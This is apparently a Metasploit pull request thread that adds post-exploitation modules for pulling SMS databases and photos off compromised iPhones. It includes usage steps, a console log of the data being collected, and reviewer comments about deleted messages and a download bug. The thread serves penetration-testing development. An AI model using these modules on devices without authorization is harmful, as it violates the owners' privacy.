### PR TITLE
Add post modules for collecting iOS images and texts

### PR DESCRIPTION
**Pull request by space-r7**
This adds two Post modules that collect images and text messages from iOS devices. 

## Verification

For `ios_text_gather`:

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use post/apple_ios/gather/ios_text_gather`
- [x] `set SESSION <session>`
- [x] `run`
- [x] You should get the sms.db file on the iPhone target

For `ios_image_gather`:

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use post/apple_ios/gather/ios_image_gather`
- [x] `set SESSION <session>`
- [x] `run`
- [x] You should get images from the iPhone target.

### CODE REVIEW

**Comment by timwr** [comment]
Excellent work. I'll test and land this asap. Last time I checked even the deleted SMS messages were still present in the db. Maybe later we can think about parsing the sqlite db, but that's beyond the scope of this pr.

**Comment by wchen-r7** [comment]
> Last time I checked even the deleted SMS messages were still present in the db. Maybe later we can think about parsing the sqlite db, but that's beyond the scope of this pr.

Nice! Yup, I agree.

**Comment by jrobles-r7** [comment]
```
msf5 post(apple_ios/gather/ios_image_gather) > run

[!] SESSION may not be compatible with this module.
[+] Image path found. Will begin searching for images...
[*] Directory for iOS images: /home/msfdev/.msf4/loot/EDHtLN
[*] Downloading image: IMG_0001.JPG
[*] Downloading image: IMG_0002.JPG
[*] Downloading image: IMG_0003.JPG
[*] Post module execution completed
msf5 post(apple_ios/gather/ios_image_gather) > use post/apple_ios/gather/ios_text_gather
msf5 post(apple_ios/gather/ios_text_gather) > options

Module options (post/apple_ios/gather/ios_text_gather):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(apple_ios/gather/ios_text_gather) > set session 1
session => 1
msf5 post(apple_ios/gather/ios_text_gather) > run

[!] SESSION may not be compatible with this module.
[+] sms.db file found
[+] sms.db stored at /home/msfdev/.msf4/loot/20181102134500_default_192.168.43.49_sms.db.file_295440.txt
[*] Post module execution completed
```

**Comment by jrobles-r7** [comment]
## Release Notes

This PR adds post modules for collecting images and texts from iOS devices.

**Comment by timwr** [comment]
Apparently this exposed a bug in downloading over mettle where `opts = { "block_size" => 262144 }` is needed to prevent some kind of crash/failure. I can't reproduce this in the latest mettle (I tried removing the block_size option and downloading a video file). None of my test devices have many photos which might be why. Let me know if you're able to reproduce it still.

**Comment by space-r7** [comment]
> Apparently this exposed a bug in downloading over mettle where `opts = { "block_size" => 262144 }` is needed to prevent some kind of crash/failure. I can't reproduce this in the latest mettle (I tried removing the block_size option and downloading a video file). None of my test devices have many photos which might be why. Let me know if you're able to reproduce it still.

That's good news! I'll try testing it out within the next few days and let you know.!

**Pull request merged**
